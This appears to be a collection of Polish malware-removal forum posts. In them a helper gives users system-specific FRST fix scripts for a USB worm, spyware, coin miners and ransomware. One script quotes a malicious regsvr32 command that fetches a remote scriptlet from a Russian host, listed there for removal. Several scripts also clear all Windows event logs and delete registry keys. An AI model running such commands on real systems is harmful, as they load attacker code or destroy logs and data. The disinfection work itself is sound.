Miszel03

Firma ESET wydała ostatnie (The Last Windows XP Security White Paper) opracowanie bezpieczeństwa dla systemu Windows XP: Windows XP Security The Last Windows XP Security White Paper

W raportach brak oznak infekcji. Nie zrobiłeś źle blokując zagrożenie. Ważne, że ścieżka znowu ta sama. Widocznie NoCoin nie blokuję pewnej strony, która ładuję koparkę. Spróbuj również blokady / kontroli wykonywania skryptów JS za pomocą rozszerzenia NoScript Security Suite.

Posty dot. prośby o raporty stąd kasuję, gdyż te zostały poprawnie dostarczone. Infekcja utworzyła folder symulujący jakoby nie miały nazwy i to jedyne co aktualnie pokazuje na tym dysku log USBFix: [13/03/2018 -13:01:08 | D ] E:\ [03/04/2018 - 00:01:36 | RASHD ] E:\Autorun.inf (to szczepionka od USBFix) Ten szkodnik przenosi do tego folderu poprawne dane z pendrive (on powinien być ukryty, ale pewnie USBFix zdjął atrybuty). Twoje pliki w tym folderze mogą się znajdować, tylko Ty ich po prostu nie widzisz - są ukryte pod atrybutem HS. Prześwietlę ten folder w skrypcie i zobaczę czy coś tam jest. Jeżeli będą tam dane to ściągnę atrybuty i powinieneś je zobaczyć. Jeśli jednak danych nie będzie, nic więcej nie da się zrobić. Komentarz w spoilerze. W systemie aktywna infekcja uruchamiana przez autostart (ale nie jestem w stanie określić konkretnej nazwy). Oprócz tego zajmuję się kasacją martwych wpisów / skrótów / resztek po oprogramowaniu (m.in po produktach Google). Przeprowadź następujące działania (omawiany pendrive musi być podpięty do portu USB w czasie wykonywania skryptu): 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\Users\KOREK\Desktop\Dokumenty\Gry\Hearthstone.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\ipla.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\iTunes.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\Origin.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\RollerCoaster Tycoon 3.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\µTorrent.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\to\Elf\Skrót do loader.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elfik\Skrót do loader.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elf\Skrót do loader.lnk HKLM-x32\...\RunOnce: [] => [X] HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\MountPoints2: {b41bcb9f-634f-11e7-a5ad-c018850ed8ce} - E:\AutoRun.exe GroupPolicy: Ograniczenia FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] C:\Program Files (x86)\Google C:\Users\KOREK\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google VirusTotal: C:\Windows\System32\scrobj.dll Folder: E:\ Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Prasuję się tutaj na pierwszy rzut oka problem sprzętowy urządzenia wejściowego - myszy. Czy masz możliwość sprawdzenia jak zachowywać się będzie inna mysz podłączona do tego komputera? Sprawdź również inny port USB.

Proszę o ścieżkę pliku, którego dotyczyła ta detekcja. Dodatkowo dostarcz nowy komplet raportów FRST.

Z tego komunikatu nie wiele wynika, padłeś ofiarą infekcji szyfrującej dane i żądającej za nie okupu. W celu identyfikacji wariantu infekcji szyfrującej (pozwoli ocenić czy istnieje dekoder) proszę przesłać zaszyfrowany plik do analizy w usłudze ID Ransomware. Wynik dostarcz w postaci zrzutu ekranu / zdjęcia. Uzupełnij też wymagana raporty systemowe.

Przypominam o zmianie haseł we wszystkich serwisach logowania. Sugeruję uruchomić również bezpieczną weryfikację dwuetapową na najważniejszych kontach logowania (jeśli możliwe). Jest mi bardzo miło, że mogłem pomóc! Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Na jakim systemie występuje ten problem? Podejrzewam, że będzie trzeba wdrożyć FIX adresujący klucz zasadniczy Kosza z jego danymi (opcje menu kontekstowego, pobór ikony oraz nazwa). Wstępnie spróbuj również wykonać reset katalogu kosza na dysku C (zostaną usunięte z niego wszystkie dane). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CreateRestorePoint: RemoveDirectory: C:\$Recycle.bin Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). System uruchomi się ponownie, po tej operacji przedstaw wynikowy fixlog.txt. 2. Napisz też jak wygląda sytuacja z koszem po tym zabiegu?

Wprawdzie nie prosiłem o to, ale dobrze to słyszeć. Pisząc Podsumuj obecną sytuację chodzi mi o to, abyś napisał jak zachowuję się teraz komputer?

1. Pierwsze wejście to plik, a drugi folder wygląda na to, że jest pusty, upewnij się i skasuj oba: C:\Users\Kratos\AppData\Roaming\OFSWO C:\Program Files (x86)\Client 2. Podsumuj obecną sytuację.

Katalog: C:\Users\Kratos\AppData\Roaming 2017-01-25 15:18 Monitor Data utworzenia tego katalogu nakłada się właśnie z datą utworzenia szkodnika, którego wykryłem w raportach. To wygląda na spyware, gdyż w katalogu masa zrzutów ekranu i logów. Malwarebytes również potwierdza moje obawy - to definitywnie Trojan.StolenData.D.Generic. Aczkolwiek mam pytanie: czy skan na pewno nie został zatrzymany (widzę, że trwał tylko 49 sekund*)? Po dezynfekcji wymagana prewencyjna zmiana haseł we wszystkich serwisach logowania i koniecznie w bankach. * jeśli skan nie został zatrzymany przejdź dalej: Poprawki i przenoszenie do kwarantanny folderu Monitor (Malwarebytes nie wiedzieć czemu przenosi tylko niektóre elementy z tego folderu), oprócz tego sprawdzam kolejne dwa foldery OFSWO i Client, gdyż ich daty nakładają się idealnie z datami wejścia infekcji. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx C:\Users\Kratos\AppData\Roaming\Monitor Folder: C:\Users\Kratos\AppData\Roaming\OFSWO Folder: C:\Program Files (x86)\Client VirusTotal: C:\Users\Kratos\AppData\Roaming\ezpinst.exe Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Wykonaj kolejny całościowy skan systemu, tym razem za pomocą Zemana AntiMalware Free. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Wspomniany folder zostanie oczywiście sprawdzony, ale oprócz niego widoczna jest inna infekcja, która panoszy się w systemie już od przeszło roku. Zajmę się również sprzątaniem resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: C:\ProgramData\Microsoft\Windows\GameExplorer\{31876D21-6CD3-4CC8-9C31-8ACE51C11C89}\SupportTasks\0\Sieć.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Deinstalacja programu Tomb Raider GOTY Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Tomb Raider GOTY Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Deinstalacja programu Fallout 4.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Fallout 4.lnk C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uninstall.lnk C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uplay.lnk HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\Policies\Explorer: [NoSaveSettings] 0 HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: G - G:\Autorun.exe HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: {2e163e10-e235-11e6-8fcf-1c6f65d0a118} - G:\autorun.exe HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: H - H:\setup\rsrc\Autorun.exe Startup: C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk [2017-01-25] ShortcutTarget: VIGIOOUbALLd.lnk -> C:\Users\Kratos\oOCJdZ7EJTCFoBjC\BPLH.exe (AutoIt Team) C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk C:\Users\Kratos\oOCJdZ7EJTCFoBjC C:\Users\Kratos\AppData\Roaming\BPLH.exe FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] U3 DfSdkS; Brak ImagePath S3 cmudaxp; system32\drivers\cmudaxp.sys [X] S3 EraserUtilDrv11710; \??\C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11710.sys [X] S3 NAVENG; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVENG.SYS [X] S3 NAVEX15; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVEX15.SYS [X] C:\Program Files (x86)\Google C:\Users\Kratos\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Folder: C:\Users\Kratos\AppData\Roaming\monitor CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kratos\AppData\Local CMD: dir /a C:\Users\Kratos\AppData\LocalLow CMD: dir /a C:\Users\Kratos\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Użyj zainstalowanego Malwarebytes Anti-Malware i po aktualizacji wykonaj nim całościowy skan systemu. Jeśli coś zostanie wykryte to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie mogę otworzyć tego załącznika. Poza tym w instrukcji napisane jest jasno, że wymagane są trzy pliki - FRST, Addition i Shortcut. Proszę o dostarcznie wszystkich trzech, jeśli jest problem z załącznikami to proszę skorzystać z serwisu wklej.org.

Dobrych Świąt wszystkim!

GandCrab Ransomware Help & Support Topic (.GDCB & GDCB-DECRYPT.txt) Pojawił się dekoder dla wersji 1. Sugeruję wypróbować go.

Proszę dostarczyć wymagane przez nas raporty. ComboFix nie jest podstawą diagnostyczną. ComboFix to nie jest narzędzie do "tworzenia loga" (skan jest inwazyjny), tylko bardzo ingerencyjny program, który zgodnie z przyrostkiem w nazwie robi potężny "FIX" oraz modyfikuje system. Do tworzenia logów mamy w rękawie kilka narzędzi nie modyfikujących wcale systemu a produkujących "zestaw podobny do ComboFix".

Chodzi o programy z sekcji aktualizacji istotnych aplikacji w podlinkowanym wyżej temacie. Skoro Windows Update nie wyszukuje nowych aktualizacji to jest OK.

Dostosuj temat do zasad działu. Proszę poczytaj również na temat używania ComboFix - to narzędzie czerwonego alertu, przeznaczone tylko dla osób przeszkolonych do jego używania. Użytkownik samodzielnie nie może go używać.

Cieszę się, że mogłem pomóc. W porządku. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Czy problem z detekcją CoinMiner nadal występuję? Malwarebytes możesz już odinstalować.

Zainstalowane rozszerzenie jest gotowe do użycia. Sekcja konfiguracyjna dostępna jest w panelu Rozszerzeń (CTRL + SHIFT + A) przy przycisku Opcje. Wymagana jest instalacja. Malwarebytes to rekomendowane narzędzie, ale jest bardzo wrażliwe na detekcje typu adware / PUP - pewnie stąd komunikaty bezpieczeństwa na względnie bezpiecznych stronach. Proszę po prostu przy instalacji nie uruchamiać ochrony w czasie rzeczywistym, a wykonać tylko pełne skanowanie i dostarczyć wyniki do analizy (nie podejmować żadnych akcji). Po tych akcjach i tak wspomnę kiedy będzie można odinstalować tą aplikację.

Raporty nie wykazują oznak infekcji. Podobny temat: Infekcja JS/CoinMiner.B. Prawdopodobnie w Twoim przypadku jest podobnie. Po wejściu na stronę ze zintegrowaną koparką kryptowalut JavaScript zostaje wykonany i rozpoczyna się proces wydobycia. Czy jesteś w stanie odtworzyć, przy której konkretnie stronie zostaje wyświetlona detekcja? Twoje rozszerzenie blokujące reklamy uBlock Origin z tego co widzę nie posiada wbudowanego filtra wykrywającego skrypty koparek. Sugeruję więc wyposażyć się dodatkowo w rozszerzenie NoCoin. Przedtem oczywiście ponownie wyczyść ciasteczka i pamięć podręczną przeglądarki. Pozostaje obserwować czy problem ustąpił. Poniżej zadaję sprzątanie resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\ProgramData\APRP\ASUSProductReg.url SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] R4 IOMap; \??\C:\Windows\system32\drivers\IOMap64.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\Artur Machnicki\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Dla świętego spokoju sugeruję również przeskanować system za pomocą skaner na żądanie np. Malwarebytes AntiMalware.

Wszyscy moderatorzy Fixitpc.pl to specjaliści w swoich dziedzinach. Nie ma obaw, że odmówimy pomocy. Picasso (dwukrotna laureatka MVP Consumer Security) bardzo rozważnie wybiera ludzi do pomocy. Rozumienie rejestru (w języku angielskim) Jak wspomniałem obszar rejestru Windows jest obszarem krytycznym. Jeśli używasz go do przyswajania wiedzy to rób to w środowisku izolowanym (instalacja osobnego systemu przy użyciu maszyny wirtualnej). Teraz skończyło się to łagodnie, ale na własne oczy widziałem zdewastowane dane rejestru do tego stopnia, że musiałem zarwać kilka nocy, żeby całościowo go odbudować i pomóc użytkownikowi.

Rozumiem, że uruchomiłeś funkcje Przywracania z poziomu Naprawy? Na przyszłość: rejestr jest obszarem krytycznym, proszę manipulować nim tylko pod okiem osoby wykwalifikowanej. Temat rozwiązany.

Dostałem informacje od Groszka, że dysk wygląda w porządku. CrystalDiskInfo posiada prosty w zrozumieniu interfejs. Pokaż jeszcze proszę raport FRST, muszę zweryfikować pewną nieprawidłowość, która widoczna była w poprzednim.